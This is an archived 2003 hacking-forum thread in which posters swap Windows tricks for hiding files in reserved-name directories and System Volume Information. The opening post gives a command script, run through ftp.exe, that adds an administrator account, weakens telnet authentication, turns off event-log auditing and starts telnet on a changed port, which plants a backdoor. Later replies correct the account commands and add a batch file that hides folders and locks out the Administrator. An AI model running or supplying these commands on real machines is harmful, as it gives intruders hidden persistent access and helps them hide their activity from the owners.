Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Microsoft Security Questions and Papers
Fuas
Dec 26 2003, 03:56 PM
Been reading this board and must say its execlent. so thought I would share some of my knowledge.

Illegal Dirs.

use md \\.\(drive):\(path)
ie md \\.\c:\recycler\com1\aux\lpt1\lpt2\nul\end

note: you must include a valid dir at the last entry to be able to enter it.

to enter the dir simply use cd c:\recycler\com1\aux\lpt1\lpt2\nul\end
and it will change. you can then store whatever into here smile.gif

another nice hideing place is c:\system volume information. this is usually unaccessible by local users. so nice to hide files smile.gif


dissable NTLM and enable clear text password in windows XP for telnet.

tlntadmn config sec=-ntlm+passwd

then then use

tlntadmn config auditlocation=file
to stop logging to eventviewer


scripting telnet using ftp.exe.

first make a txt file with the commands you need. ie

file.txt contains
net user testing test123 /add
net localgroup administrators test123 /add
tlntadmin config sec=-ntlm+passwd
tlntadmn config auditlocation=file
tlntadmn config port=2222
net start telnet
quit

(so adds a username to the system. then enables clear text, change telnet port to 2222 and then starts the telnet service)

to run use ftp.exe -s:file.txt -n (ip) (port)

it will then connect to the (ip) using (port) and run the commands in the file smile.gif

____

hope this info is usefull to somebody out there smile.gif njoy and b safe.

Note: Updated the telnet bits. shoud work correct now sorry.
GhostCow
Dec 27 2003, 12:03 AM
thanks great info!!
does the illegal dir stay hidden after you put files in it too?
daTh0r
Dec 27 2003, 12:08 AM
thx laugh.gif

i'll try it immediatly laugh.gif
jimmy
Dec 27 2003, 12:49 AM
hmmz
there are several commands to display everything in those locked dirs
the most easy one is

dir *.* /s

when you start in that dir of course

example

CODE


D:\test\temp>dir *.* /s
De volumenaam van station D is HARDDISK
Het volumenummer is 80DA-684B

Map van D:\test\temp

27/12/2003  01:49    <DIR>          .
27/12/2003  01:49    <DIR>          ..
27/12/2003  01:49    <DIR>          lala
27/12/2003  01:49    <DIR>          tata
              0 bestand(en)                0 bytes

Map van D:\test\temp\lala

27/12/2003  01:49    <DIR>          .
27/12/2003  01:49    <DIR>          ..
              0 bestand(en)                0 bytes

Map van D:\test\temp\tata

27/12/2003  01:49    <DIR>          .
27/12/2003  01:49    <DIR>          ..
              0 bestand(en)                0 bytes

    Totaal aantal weergegeven bestanden:
              0 bestand(en)                0 bytes
              8 map(pen)  58.934.087.680 bytes beschikbaar


this will also show the locked paths/Illegal Dirs.
Fuas
Dec 27 2003, 08:55 AM
Jimmy, you are correct, But if you use c:\system volume information\com1\aux\hidden then you carnt dir /s because you cannot enter system volume information locally. and if try remotly cannot enter the com1 dir to find the rest of the path.

Ghostcow: yes the dir stays hidden. even after files added.

you can also dir \\.\dirs to find path too. but passed the info as it may hide stuff better then some ppl are doing atm (like useing c:\stro to store stuff ;) )
zero-maitimax
Dec 27 2003, 07:05 PM
and now the bigquestion... can you put a active exe file in it.. and it still can run it...
skorpio
Dec 27 2003, 11:08 PM
Fluas thx for the sharing, but there is a error tongue.gif

when u create a user :

QUOTE

net user testing test123 /add
net localgroup administrators test123 /add


u give the attributes at user "test123" and u have create the user testing biggrin.gif

therefore the exact writing is:


net user testing test123 /add
net localgroup Administrators testing /add


Thx another for the sharing, bye biggrin.gif
sorry for my english :-\
Jackson
Dec 28 2003, 01:02 PM
CODE

@echo off
md e:\System Volume Information\dir\
md e:\System Volume Information\dir\aux\ \
md e:\System Volume Information\dir\aux\.tmp\
md e:\System Volume Information\dir\aux\.tmp\result
cacls e:\System Volume Information\dir\\* /T /E /P Administrator:N
echo Hidden Directory is created
@echo on


when u have make ur hidden dir then u can put all files in this dir and can exec files
sry fo my english
LittleHacker
Dec 28 2003, 01:43 PM
www.Free-Host.com is Hacked!

< I cant add a New Topic ! >
skorpio
Dec 28 2003, 03:46 PM
LittleHacker which it is the sense of yours post ????


you are a spammer!! -.-
LittleHacker
Jan 16 2004, 10:58 PM
QUOTE
LittleHacker which it is the sense of yours post ????


you are a spammer!! -.-


No But I'm not able to make a new topic and I'd told this
QUOTE
< I cant add a New Topic ! >


Why?
I think I'd not enough posts! sad.gif
saendler
Jan 17 2004, 01:56 PM
QUOTE (Jackson @ Dec 28 2003, 01:02 PM)
CODE

@echo off
md e:\System Volume Information\dir\
md e:\System Volume Information\dir\aux\ \
md e:\System Volume Information\dir\aux\.tmp\
md e:\System Volume Information\dir\aux\.tmp\result
cacls e:\System Volume Information\dir\\* /T /E /P Administrator:N
echo Hidden Directory is created
@echo on


when u have make ur hidden dir then u can put all files in this dir and can exec files
sry fo my english

very nice way to hide folder and how to delete such?

thx

^GuZeD^
Jan 17 2004, 04:29 PM
thanx for the folder hiding tip, was always doing it on a other way but this one looks better, will try it when i have to fix a new box.
saendler
Jan 17 2004, 04:41 PM
how to delete
----------------
look into hidden folder e.g. dir \\.\C:\SystemVolumeInformation\dir\aux\.tmp

to delete e.g. rd \\.\C:\SystemVolumeInformation\dir\aux\.tmp\result
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.